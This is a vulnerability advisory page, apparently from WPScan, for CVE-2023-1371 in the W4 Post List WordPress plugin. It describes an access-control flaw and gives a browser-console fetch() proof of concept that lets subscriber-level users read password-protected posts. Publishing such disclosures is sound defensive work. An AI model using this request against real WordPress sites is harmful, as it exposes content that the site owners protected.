W4 Post List < 2.4.6 – Subscriber+ Password Protected Post Content Disclosure | CVE 2023-1371 | Plugin Vulnerabilities

Description

The plugin does not ensure that password protected posts can be accessed before displaying their content, which could allow any authenticated users to access them

Proof of Concept

Setup: Create a default Post list, and create a password protected post with secret content

Then, run the below command in the developer console of the web browser while being on the blog as a subscriber user

fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "method": "POST",
  "body": "action=parse-media-shortcode&shortcode=[postlist listId='1']",
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));

This will display the content of the password protected post

Affects Plugins

Fixed in 2.4.6

References

CVE

Classification

Type

NO AUTHORISATION

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

Erwan LR (WPScan)

Submitter website

https://wpscan.com

Verified

Yes

WPVDB ID

ad5c167e-77f7-453c-9443-df6e07705d89

Timeline

Publicly Published

2023-03-22 (about 1 years ago)

Added

2023-03-22 (about 1 years ago)

Last Updated

2023-04-24 (about 1 years ago)

Other

Published

Title

Published

2024-04-29

Title

WidgetKit <= 2.5.0 - Missing Authorization to Notice Dismissal

Published

2023-12-18

Title

Essential Real Estate < 4.4.0 - Subscriber+ Denial of Service via Arbitrary Option Update

Published

2024-04-22

Title

CookieHub < 1.1.1 - Missing Authorization

Published

2024-03-06

Title

Post Form – Registration Form – Profile Form for User Profiles – Frontend Content Forms for User Submissions (UGC) < 2.8.8 - Missing Authorization to Unauthenticated Media Upload

Published

2023-04-18

Title

Essential Blocks < 4.0.7 - Multiple Functions Missing Authorization Checks